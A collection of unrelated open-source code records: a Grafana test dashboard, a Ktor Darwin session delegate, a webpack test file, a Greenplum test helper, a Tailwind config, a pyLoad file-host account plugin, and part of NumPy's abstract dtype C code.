"alias": "Bar datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=bar,datacenter.region=us-east-2",
"refId": "B",
"scenarioId": "random_walk"
}
],
"thresholds": [],
"timeRegions": [],
"title": "Multiple series",
"tooltip": {
"shared": true,
"sort": 0,
"value_type": "individual"
},
"type": "timeseries",
"xaxis": {
"mode": "time",
"show": true,
"values": []
},
"yaxes": [
{
"format": "short",
"logBase": 1,
"show": true
},
{
"format": "short",
"logBase": 1,
"show": true
}
],
"yaxis": {
"align": false
}
},
{
"aliasColors": {},
"autoMigrateFrom": "graph",
"bars": false,
"dashLength": 10,
"dashes": false,
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"fill": 1,
"fillGradient": 0,
"gridPos": {
"h": 8,
"w": 9,
"x": 15,
"y": 0
},
"id": 9,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"nullPointMode": "null",
"options": {
"dataLinks": [
{
"targetBlank": false,
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-seriesName=${__series.name}\u0026var-valueTime=${__value.time}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}\u0026var-fieldName=${__field.name}"
}
]
},
"percentage": false,
"pointradius": 2,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"spaceLength": 10,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "Foo datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=foo,datacenter.region=us-east-1",
"refId": "A",
"scenarioId": "random_walk_table",
"stringInput": ""
}
],
"thresholds": [],
"timeRegions": [],
"title": "Multiple fields",
"tooltip": {
"shared": true,
"sort": 0,
"value_type": "individual"
},
"type": "timeseries",
"xaxis": {
"mode": "time",
"show": true,
"values": []
},
"yaxes": [
{
"format": "short",
"logBase": 1,
"show": true
},
{
"format": "short",
"logBase": 1,
"show": true
}
],
"yaxis": {
"align": false
}
},
{
"datasource": {
"uid": "-- Dashboard --"
},
"gridPos": {
"h": 8,
"w": 9,
"x": 6,
"y": 8
},
"id": 6,
"options": {
"displayMode": "lcd",
"fieldOptions": {
"calcs": [
"last"
],
"defaults": {
"links": [
{
"targetBlank": true,
"title": "Drill it down!",
"url": "/d/wfTJJL5Wz/datalinks-source\n?var-fieldName=${__field.name}\n\u0026var-labelDatacenter=${__field.labels.datacenter}\n\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\n\u0026var-valueNumeric=${__value.numeric}\n\u0026var-valueText=${__value.text}\n\u0026var-valueCalc=${__value.calc}"
}
],
"mappings": [
{
"id": 0,
"op": "=",
"text": "N/A",
"type": 1,
"value": "null"
}
],
"max": 100,
"min": 0,
"nullValueMode": "connected",
"thresholds": [
{
"color": "green"
},
{
"color": "red",
"value": 80
}
],
"title": "${__series.name} - $__calc",
"unit": "none"
},
"override": {},
"values": false
},
"orientation": "horizontal"
},
"pluginVersion": "6.4.0-pre",
"targets": [
{
"datasource": {
"uid": "-- Dashboard --"
},
"panelId": 2,
"refId": "A"
}
],
"title": "Value reducers 1",
"type": "bargauge"
},
{
"datasource": {
"uid": "-- Dashboard --"
},
"gridPos": {
"h": 8,
"w": 9,
"x": 15,
"y": 8
},
"id": 4,
"options": {
"fieldOptions": {
"calcs": [
"mean"
],
"defaults": {
"links": [
{
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-fieldName=${__field.name}\u0026var-labelDatacenter=${__field.labels.datacenter}\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}\u0026var-valueCalc=${__value.calc}"
}
],
"mappings": [],
"max": 100,
"min": 0,
"thresholds": [
{
"color": "green"
},
{
"color": "red",
"value": 80
}
],
"title": "${__series.name} - $__calc"
},
"override": {},
"values": false
},
"orientation": "auto",
"showThresholdLabels": false,
"showThresholdMarkers": true
},
"pluginVersion": "6.4.0-pre",
"targets": [
{
"datasource": {
"uid": "-- Dashboard --"
},
"panelId": 2,
"refId": "A"
}
],
"title": "Value reducers 2",
"type": "gauge"
}
],
"refresh": "",
"schemaVersion": 42,
"tags": [
"gdev",
"templating"
],
"templating": {
"list": [
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"label": "Series name",
"name": "seriesName",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "labelDatacenter",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "labelDatacenterRegion",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueTime",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueNumeric",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueText",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "valueCalc",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
},
{
"current": {
"text": "",
"value": ""
},
"hide": 2,
"name": "fieldName",
"options": [
{
"text": "",
"value": ""
}
],
"query": "",
"skipUrlSync": false,
"type": "textbox"
}
]
},
"time": {
"from": "now-6h",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
]
},
"timezone": "",
"title": "Datalinks - variables",
"uid": "wfTJJL5Wz",
"weekStart": ""
} | json | github | https://github.com/grafana/grafana | apps/dashboard/pkg/migration/conversion/testdata/input/migrated_dev_dashboards/feature-templating/v1beta1.testdata-datalinks.v42.json |
/*
* Copyright 2014-2025 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.engine.darwin
import io.ktor.client.engine.darwin.internal.*
import io.ktor.client.plugins.websocket.WEBSOCKETS_KEY
import io.ktor.client.request.*
import io.ktor.util.collections.*
import io.ktor.utils.io.InternalAPI
import io.ktor.websocket.ChannelConfig
import kotlinx.cinterop.ExperimentalForeignApi
import kotlinx.cinterop.UnsafeNumber
import kotlinx.cinterop.convert
import kotlinx.coroutines.CompletableDeferred
import platform.Foundation.*
import platform.darwin.NSObject
import kotlin.collections.set
import kotlin.coroutines.CoroutineContext
private const val HTTP_REQUESTS_INITIAL_CAPACITY = 32
private const val WS_REQUESTS_INITIAL_CAPACITY = 16
/**
* Creates an instance of [KtorNSURLSessionDelegate]
*
* [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate)
*/
@OptIn(UnsafeNumber::class)
public fun KtorNSURLSessionDelegate(): KtorNSURLSessionDelegate {
return KtorNSURLSessionDelegate(null)
}
/**
* A delegate for [NSURLSession] that bridges it to Ktor.
* If users set custom session in [DarwinClientEngineConfig.sessionAndDelegate],
* they need to register this delegate in their session.
* This can be done by registering it directly,
* extending their custom delegate from it
* or by calling required methods from their custom delegate.
*
* For HTTP requests to work property, it's important that users call these functions:
* * URLSession:dataTask:didReceiveData:
* * URLSession:task:didCompleteWithError:
* * URLSession:task:willPerformHTTPRedirection:newRequest:completionHandler:
*
* For WebSockets to work, it's important that users call these functions:
* * URLSession:webSocketTask:didOpenWithProtocol:
* * URLSession:webSocketTask:didCloseWithCode:reason:
*
* [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate)
*/
@OptIn(UnsafeNumber::class)
public class KtorNSURLSessionDelegate(
internal val challengeHandler: ChallengeHandler?
) : NSObject(), NSURLSessionDataDelegateProtocol, NSURLSessionWebSocketDelegateProtocol {
private val taskHandlers: ConcurrentMap<NSURLSessionTask, DarwinTaskHandler> =
ConcurrentMap(HTTP_REQUESTS_INITIAL_CAPACITY)
private val webSocketSessions: ConcurrentMap<NSURLSessionWebSocketTask, DarwinWebsocketSession> =
ConcurrentMap(WS_REQUESTS_INITIAL_CAPACITY)
override fun URLSession(session: NSURLSession, dataTask: NSURLSessionDataTask, didReceiveData: NSData) {
val taskHandler = taskHandlers[dataTask] ?: return
taskHandler.receiveData(dataTask, didReceiveData)
}
override fun URLSession(session: NSURLSession, taskIsWaitingForConnectivity: NSURLSessionTask) {
}
override fun URLSession(session: NSURLSession, task: NSURLSessionTask, didCompleteWithError: NSError?) {
taskHandlers[task]?.let {
it.complete(task, didCompleteWithError)
taskHandlers.remove(task)
}
webSocketSessions[task]?.didComplete(didCompleteWithError)
}
override fun URLSession(
session: NSURLSession,
webSocketTask: NSURLSessionWebSocketTask,
didOpenWithProtocol: String?
) {
val wsSession = webSocketSessions[webSocketTask] ?: return
wsSession.didOpen(didOpenWithProtocol)
}
override fun URLSession(
session: NSURLSession,
webSocketTask: NSURLSessionWebSocketTask,
didCloseWithCode: NSURLSessionWebSocketCloseCode,
reason: NSData?
) {
val wsSession = webSocketSessions[webSocketTask] ?: return
wsSession.didClose(didCloseWithCode, reason, webSocketTask)
}
internal fun read(
request: HttpRequestData,
task: NSURLSessionWebSocketTask,
callContext: CoroutineContext
): CompletableDeferred<HttpResponseData> {
@OptIn(InternalAPI::class)
val wsConfig = request.attributes[WEBSOCKETS_KEY]
val taskHandler = DarwinWebsocketSession(
callContext,
task,
wsConfig.channelsConfig
)
webSocketSessions[task] = taskHandler
// Fields MUST be assigned to the task BEFORE starting it.
// The "maximum message size" actually refers to the underlying buffer,
// so it will allow >= maxFrameSize, depending on how quickly our bytes are read to the buffer.
@OptIn(ExperimentalForeignApi::class)
task.setMaximumMessageSize(wsConfig.maxFrameSize.convert())
return taskHandler.response
}
internal fun read(
request: HttpRequestData,
callContext: CoroutineContext,
task: NSURLSessionTask
): CompletableDeferred<HttpResponseData> {
val taskHandler = DarwinTaskHandler(request, callContext)
taskHandlers[task] = taskHandler
return taskHandler.response
}
/**
* Disable embedded redirects.
*
* [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate.URLSession)
*/
override fun URLSession(
session: NSURLSession,
task: NSURLSessionTask,
willPerformHTTPRedirection: NSHTTPURLResponse,
newRequest: NSURLRequest,
completionHandler: (NSURLRequest?) -> Unit
) {
completionHandler(null)
}
/**
* Handle challenge.
*
* [Report a problem](https://ktor.io/feedback/?fqname=io.ktor.client.engine.darwin.KtorNSURLSessionDelegate.URLSession)
*/
override fun URLSession(
session: NSURLSession,
task: NSURLSessionTask,
didReceiveChallenge: NSURLAuthenticationChallenge,
completionHandler: (NSURLSessionAuthChallengeDisposition, NSURLCredential?) -> Unit
) {
val handler = challengeHandler ?: run {
completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, didReceiveChallenge.proposedCredential)
return
}
try {
handler(session, task, didReceiveChallenge, completionHandler)
} catch (cause: Throwable) {
taskHandlers[task]?.saveFailure(cause)
completionHandler(NSURLSessionAuthChallengeCancelAuthenticationChallenge, null)
}
}
} | kotlin | github | https://github.com/ktorio/ktor | ktor-client/ktor-client-darwin/darwin/src/io/ktor/client/engine/darwin/KtorNSURLSessionDelegate.kt |
export function generateSummary() {
return 1;
}
export function entityActionQueue() {
return 2;
}
export function bar() {
return 3;
} | javascript | github | https://github.com/webpack/webpack | test/cases/context/issue-18752/folder/file.js |
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
import tinctest
from tinctest.lib import local_path
from mpp.lib.PSQL import PSQL
from tinctest.lib import run_shell_command
from gppylib.commands.base import Command
from gppylib.db import dbconn
class Disk():
'''Methods relating to disk usage, dca disk policy etc'''
def __init__(self):
pass
def get_disk_usage(self, hostname, partition='/data'):
'''Returns the disk usage of individual hosts'''
cmd_str = "ssh %s df %s | grep -v Filesystem |awk \'{print $4}\'" % (hostname, partition)
results={'rc':0, 'stdout':'', 'stderr':''}
run_shell_command(cmd_str, results=results)
return results1['rc'], results1['stdout']
class Database():
def setupDatabase(self, dbname = None):
#Create a database , if none same name as user
if dbname is None:
dbname = os.environ["USER"]
cmd = Command(name='Drop if exists and Create the database', cmdStr='dropdb %s;createdb %s' % (dbname, dbname))
cmd.run()
if cmd.get_results().rc != 0:
raise Exception("Create database %s failed" % dbname)
tinctest.logger.info("Database %s is created" % dbname)
def dropDatabase(self, dbname = None):
if dbname is None:
raise Exception(' No database name provided')
cmd = Command(name='Drop database', cmdStr='dropdb %s' % (dbname))
cmd.run()
if cmd.get_results().rc != 0:
raise Exception("Drop database %s failed" % dbname)
tinctest.logger.info("Database %s is droped" % dbname)
def is_debug(self):
version_str = PSQL.run_sql_command('select version();', flags = '-q -t', dbname= 'postgres')
print version_str
if 'assert' in version_str :
print ' coming in if'
return True
class Config():
def __init__(self):
pass
def getMasterMirrorHostname(self):
sql_cmd = "select hostname from gp_segment_configuration where content = -1 and role = 'm'"
out = PSQL.run_sql_command(sql_cmd, dbname = 'template1')
return out.strip()
return False | unknown | codeparrot/codeparrot-clean | ||
/** @type {import('tailwindcss').Config} \*/
module.exports = {
content: [
"./pages/**/*.{js,ts,jsx,tsx}",
"./components/**/*.{js,ts,jsx,tsx}",
],
theme: {
fontFamily: {
sans: ["var(--font-montserrat)"],
},
},
future: {
hoverOnlyWhenSupported: true,
},
plugins: [require("@tailwindcss/aspect-ratio")],
}; | javascript | github | https://github.com/vercel/next.js | examples/with-sfcc/tailwind.config.js |
# -*- coding: utf-8 -*-
import re
import time
import urlparse
from module.plugins.internal.Account import Account
from module.plugins.internal.Plugin import parse_html_form, set_cookie
class XFSAccount(Account):
__name__ = "XFSAccount"
__type__ = "account"
__version__ = "0.42"
__status__ = "testing"
__description__ = """XFileSharing account plugin"""
__license__ = "GPLv3"
__authors__ = [("zoidberg" , "zoidberg@mujmail.cz"),
("Walter Purcaro", "vuolter@gmail.com" )]
HOSTER_DOMAIN = None
HOSTER_URL = None
LOGIN_URL = None
COOKIES = True
PREMIUM_PATTERN = r'\(Premium only\)'
VALID_UNTIL_PATTERN = r'Premium.[Aa]ccount expire:.*?(\d{1,2} [\w^_]+ \d{4})'
TRAFFIC_LEFT_PATTERN = r'Traffic available today:.*?<b>\s*(?P<S>[\d.,]+|[Uu]nlimited)\s*(?:(?P<U>[\w^_]+)\s*)?</b>'
TRAFFIC_LEFT_UNIT = "MB" #: Used only if no group <U> was found
LEECH_TRAFFIC_PATTERN = r'Leech Traffic left:<b>.*?(?P<S>[\d.,]+|[Uu]nlimited)\s*(?:(?P<U>[\w^_]+)\s*)?</b>'
LEECH_TRAFFIC_UNIT = "MB" #: Used only if no group <U> was found
LOGIN_FAIL_PATTERN = r'Incorrect Login or Password|account was banned|Error<'
def parse_info(self, user, password, data, req):
validuntil = None
trafficleft = None
leechtraffic = None
premium = None
if not self.HOSTER_URL: #@TODO: Remove in 0.4.10
return {'validuntil' : validuntil,
'trafficleft' : trafficleft,
'leechtraffic': leechtraffic,
'premium' : premium}
html = self.load(self.HOSTER_URL,
get={'op': "my_account"},
cookies=self.COOKIES)
premium = True if re.search(self.PREMIUM_PATTERN, html) else False
m = re.search(self.VALID_UNTIL_PATTERN, html)
if m:
expiredate = m.group(1).strip()
self.log_debug("Expire date: " + expiredate)
try:
validuntil = time.mktime(time.strptime(expiredate, "%d %B %Y"))
except Exception, e:
self.log_error(e)
else:
self.log_debug("Valid until: %s" % validuntil)
if validuntil > time.mktime(time.gmtime()):
premium = True
trafficleft = -1
else:
premium = False
validuntil = None #: Registered account type (not premium)
else:
self.log_debug("VALID_UNTIL_PATTERN not found")
m = re.search(self.TRAFFIC_LEFT_PATTERN, html)
if m:
try:
traffic = m.groupdict()
size = traffic['S']
if "nlimited" in size:
trafficleft = -1
if validuntil is None:
validuntil = -1
else:
if 'U' in traffic:
unit = traffic['U']
elif isinstance(self.TRAFFIC_LEFT_UNIT, basestring):
unit = self.TRAFFIC_LEFT_UNIT
else:
unit = ""
trafficleft = self.parse_traffic(size + unit)
except Exception, e:
self.log_error(e)
else:
self.log_debug("TRAFFIC_LEFT_PATTERN not found")
leech = [m.groupdict() for m in re.finditer(self.LEECH_TRAFFIC_PATTERN, html)]
if leech:
leechtraffic = 0
try:
for traffic in leech:
size = traffic['S']
if "nlimited" in size:
leechtraffic = -1
if validuntil is None:
validuntil = -1
break
else:
if 'U' in traffic:
unit = traffic['U']
elif isinstance(self.LEECH_TRAFFIC_UNIT, basestring):
unit = self.LEECH_TRAFFIC_UNIT
else:
unit = ""
leechtraffic += self.parse_traffic(size + unit)
except Exception, e:
self.log_error(e)
else:
self.log_debug("LEECH_TRAFFIC_PATTERN not found")
return {'validuntil' : validuntil,
'trafficleft' : trafficleft,
'leechtraffic': leechtraffic,
'premium' : premium}
def login(self, user, password, data, req):
if self.HOSTER_DOMAIN:
if not self.HOSTER_URL:
self.HOSTER_URL = "http://www.%s/" % self.HOSTER_DOMAIN
if self.COOKIES:
if isinstance(self.COOKIES, list) and not self.COOKIES.count((self.HOSTER_DOMAIN, "lang", "english")):
self.COOKIES.insert((self.HOSTER_DOMAIN, "lang", "english"))
else:
set_cookie(self.req.cj, self.HOSTER_DOMAIN, "lang", "english")
if not self.HOSTER_URL:
self.login_fail(_("Missing HOSTER_URL"))
if not self.LOGIN_URL:
self.LOGIN_URL = urlparse.urljoin(self.HOSTER_URL, "login.html")
html = self.load(self.LOGIN_URL, cookies=self.COOKIES)
action, inputs = parse_html_form('name="FL"', html)
if not inputs:
inputs = {'op' : "login",
'redirect': self.HOSTER_URL}
inputs.update({'login' : user,
'password': password})
if action:
url = urlparse.urljoin("http://", action)
else:
url = self.HOSTER_URL
html = self.load(url, post=inputs, cookies=self.COOKIES)
if re.search(self.LOGIN_FAIL_PATTERN, html):
self.login_fail() | unknown | codeparrot/codeparrot-clean | ||
#define NPY_NO_DEPRECATED_API NPY_API_VERSION
#define _MULTIARRAYMODULE
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include <structmember.h>
#include "numpy/ndarraytypes.h"
#include "numpy/arrayobject.h"
#include "dtypemeta.h"
#include "abstractdtypes.h"
#include "array_coercion.h"
#include "common.h"
static inline PyArray_Descr *
int_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
return PyArray_DescrFromType(NPY_INTP);
}
static PyArray_Descr *
discover_descriptor_from_pylong(
PyArray_DTypeMeta *NPY_UNUSED(cls), PyObject *obj)
{
assert(PyLong_Check(obj));
/*
* We check whether long is good enough. If not, check longlong and
* unsigned long before falling back to `object`.
*/
long long value = PyLong_AsLongLong(obj);
if (error_converting(value)) {
PyErr_Clear();
}
else {
if (NPY_MIN_INTP <= value && value <= NPY_MAX_INTP) {
return PyArray_DescrFromType(NPY_INTP);
}
return PyArray_DescrFromType(NPY_LONGLONG);
}
unsigned long long uvalue = PyLong_AsUnsignedLongLong(obj);
if (uvalue == (unsigned long long)-1 && PyErr_Occurred()){
PyErr_Clear();
}
else {
return PyArray_DescrFromType(NPY_ULONGLONG);
}
return PyArray_DescrFromType(NPY_OBJECT);
}
static inline PyArray_Descr *
float_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
return PyArray_DescrFromType(NPY_DOUBLE);
}
static PyArray_Descr*
discover_descriptor_from_pyfloat(
PyArray_DTypeMeta* NPY_UNUSED(cls), PyObject *obj)
{
assert(PyFloat_CheckExact(obj));
return PyArray_DescrFromType(NPY_DOUBLE);
}
static inline PyArray_Descr *
complex_default_descriptor(PyArray_DTypeMeta* NPY_UNUSED(cls))
{
return PyArray_DescrFromType(NPY_CDOUBLE);
}
static PyArray_Descr*
discover_descriptor_from_pycomplex(
PyArray_DTypeMeta* NPY_UNUSED(cls), PyObject *obj)
{
assert(PyComplex_CheckExact(obj));
return PyArray_DescrFromType(NPY_COMPLEX128);
}
NPY_NO_EXPORT int
initialize_and_map_pytypes_to_dtypes()
{
if (PyType_Ready((PyTypeObject *)&PyArray_IntAbstractDType) < 0) {
return -1;
}
if (PyType_Ready((PyTypeObject *)&PyArray_FloatAbstractDType) < 0) {
return -1;
}
if (PyType_Ready((PyTypeObject *)&PyArray_ComplexAbstractDType) < 0) {
return -1;
}
/*
* Delayed assignments to avoid "error C2099: initializer is not a constant"
* in windows compilers. Can hopefully be done in structs in the future.
*/
((PyTypeObject *)&PyArray_PyLongDType)->tp_base =
(PyTypeObject *)&PyArray_IntAbstractDType;
PyArray_PyLongDType.scalar_type = &PyLong_Type;
if (PyType_Ready((PyTypeObject *)&PyArray_PyLongDType) < 0) {
return -1;
}
((PyTypeObject *)&PyArray_PyFloatDType)->tp_base =
(PyTypeObject *)&PyArray_FloatAbstractDType;
PyArray_PyFloatDType.scalar_type = &PyFloat_Type;
if (PyType_Ready((PyTypeObject *)&PyArray_PyFloatDType) < 0) {
return -1;
}
((PyTypeObject *)&PyArray_PyComplexDType)->tp_base =
(PyTypeObject *)&PyArray_ComplexAbstractDType;
PyArray_PyComplexDType.scalar_type = &PyComplex_Type;
if (PyType_Ready((PyTypeObject *)&PyArray_PyComplexDType) < 0) {
return -1;
}
/* Register the new DTypes for discovery */
if (_PyArray_MapPyTypeToDType(
&PyArray_PyLongDType, &PyLong_Type, NPY_FALSE) < 0) {
return -1;
}
if (_PyArray_MapPyTypeToDType(
&PyArray_PyFloatDType, &PyFloat_Type, NPY_FALSE) < 0) {
return -1;
}
if (_PyArray_MapPyTypeToDType(
&PyArray_PyComplexDType, &PyComplex_Type, NPY_FALSE) < 0) {
return -1;
}
/*
* Map str, bytes, and bool, for which we do not need abstract versions
* to the NumPy DTypes. This is done here using the `is_known_scalar_type`
* function.
* TODO: The `is_known_scalar_type` function is considered preliminary,
* the same could be achieved e.g. with additional abstract DTypes.
*/
PyArray_DTypeMeta *dtype;
dtype = typenum_to_dtypemeta(NPY_UNICODE);
if (_PyArray_MapPyTypeToDType(dtype, &PyUnicode_Type, NPY_FALSE) < 0) {
return -1;
}
dtype = typenum_to_dtypemeta(NPY_STRING);
if (_PyArray_MapPyTypeToDType(dtype, &PyBytes_Type, NPY_FALSE) < 0) {
return -1;
}
dtype = typenum_to_dtypemeta(NPY_BOOL);
if (_PyArray_MapPyTypeToDType(dtype, &PyBool_Type, NPY_FALSE) < 0) {
return -1;
}
return 0;
}
/*
* The following functions define the "common DType" for the abstract dtypes.
*
* Note that the logic with respect to the "higher" dtypes such as floats
* could likely be more logically defined for them, but since NumPy dtypes
* largely "know" each other, that is not necessary.
*/
static PyArray_DTypeMeta *
int_common_dtype(PyArray_DTypeMeta *NPY_UNUSED(cls), PyArray_DTypeMeta *other)
{
if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
if (other->type_num == NPY_BOOL) {
/* Use the default integer for bools: */
return NPY_DT_NewRef(&PyArray_IntpDType);
}
}
else if (NPY_DT_is_legacy(other)) {
/* This is a back-compat fallback to usually do the right thing... */
PyArray_DTypeMeta *uint8_dt = &PyArray_UInt8DType;
PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, uint8_dt);
if (res == NULL) {
PyErr_Clear();
}
else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
Py_DECREF(res);
}
else {
return res;
}
/* Try again with `int8`, an error may have been set, though */
PyArray_DTypeMeta *int8_dt = &PyArray_Int8DType;
res = NPY_DT_CALL_common_dtype(other, int8_dt);
if (res == NULL) {
PyErr_Clear();
}
else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
Py_DECREF(res);
}
else {
return res;
}
/* And finally, we will try the default integer, just for sports... */
PyArray_DTypeMeta *default_int = &PyArray_IntpDType;
res = NPY_DT_CALL_common_dtype(other, default_int);
if (res == NULL) {
PyErr_Clear();
}
return res;
}
Py_INCREF(Py_NotImplemented);
return (PyArray_DTypeMeta *)Py_NotImplemented;
}
static PyArray_DTypeMeta *
float_common_dtype(PyArray_DTypeMeta *cls, PyArray_DTypeMeta *other)
{
if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
if (other->type_num == NPY_BOOL || PyTypeNum_ISINTEGER(other->type_num)) {
/* Use the default integer for bools and ints: */
return NPY_DT_NewRef(&PyArray_DoubleDType);
}
}
else if (other == &PyArray_PyLongDType) {
Py_INCREF(cls);
return cls;
}
else if (NPY_DT_is_legacy(other)) {
/* This is a back-compat fallback to usually do the right thing... */
PyArray_DTypeMeta *half_dt = &PyArray_HalfDType;
PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, half_dt);
if (res == NULL) {
PyErr_Clear();
}
else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
Py_DECREF(res);
}
else {
return res;
}
/* Retry with double (the default float) */
PyArray_DTypeMeta *double_dt = &PyArray_DoubleDType;
res = NPY_DT_CALL_common_dtype(other, double_dt);
return res;
}
Py_INCREF(Py_NotImplemented);
return (PyArray_DTypeMeta *)Py_NotImplemented;
}
static PyArray_DTypeMeta *
complex_common_dtype(PyArray_DTypeMeta *cls, PyArray_DTypeMeta *other)
{
if (NPY_DT_is_legacy(other) && other->type_num < NPY_NTYPES_LEGACY) {
if (other->type_num == NPY_BOOL ||
PyTypeNum_ISINTEGER(other->type_num)) {
/* Use the default integer for bools and ints: */
return NPY_DT_NewRef(&PyArray_CDoubleDType);
}
}
else if (NPY_DT_is_legacy(other)) {
/* This is a back-compat fallback to usually do the right thing... */
PyArray_DTypeMeta *cfloat_dt = &PyArray_CFloatDType;
PyArray_DTypeMeta *res = NPY_DT_CALL_common_dtype(other, cfloat_dt);
if (res == NULL) {
PyErr_Clear();
}
else if (res == (PyArray_DTypeMeta *)Py_NotImplemented) {
Py_DECREF(res);
}
else {
return res;
}
/* Retry with cdouble (the default complex) */
PyArray_DTypeMeta *cdouble_dt = &PyArray_CDoubleDType;
res = NPY_DT_CALL_common_dtype(other, cdouble_dt);
return res;
}
else if (other == &PyArray_PyLongDType ||
other == &PyArray_PyFloatDType) {
Py_INCREF(cls);
return cls;
}
Py_INCREF(Py_NotImplemented);
return (PyArray_DTypeMeta *)Py_NotImplemented;
}
/*
* Define abstract numerical DTypes that all regular ones can inherit from
* (in arraytypes.c.src).
* Here, also define types corresponding to the python scalars.
*/
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_IntAbstractDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._IntegerAbstractDType",
.tp_base = &PyArrayDescr_Type,
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
.flags = NPY_DT_ABSTRACT,
};
NPY_DType_Slots pylongdtype_slots = {
.discover_descr_from_pyobject = discover_descriptor_from_pylong,
.default_descr = int_default_descriptor,
.common_dtype = int_common_dtype,
};
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyLongDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._PyLongDType",
.tp_base = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
.dt_slots = &pylongdtype_slots,
.scalar_type = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
};
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_FloatAbstractDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._FloatAbstractDType",
.tp_base = &PyArrayDescr_Type,
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
.flags = NPY_DT_ABSTRACT,
};
NPY_DType_Slots pyfloatdtype_slots = {
.discover_descr_from_pyobject = discover_descriptor_from_pyfloat,
.default_descr = float_default_descriptor,
.common_dtype = float_common_dtype,
};
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_PyFloatDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._PyFloatDType",
.tp_base = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
.dt_slots = &pyfloatdtype_slots,
.scalar_type = NULL, /* set in initialize_and_map_pytypes_to_dtypes */
};
NPY_NO_EXPORT PyArray_DTypeMeta PyArray_ComplexAbstractDType = {{{
PyVarObject_HEAD_INIT(&PyArrayDTypeMeta_Type, 0)
.tp_name = "numpy.dtypes._ComplexAbstractDType",
.tp_base = &PyArrayDescr_Type,
.tp_basicsize = sizeof(PyArray_Descr),
.tp_flags = Py_TPFLAGS_DEFAULT,
},},
.type_num = -1,
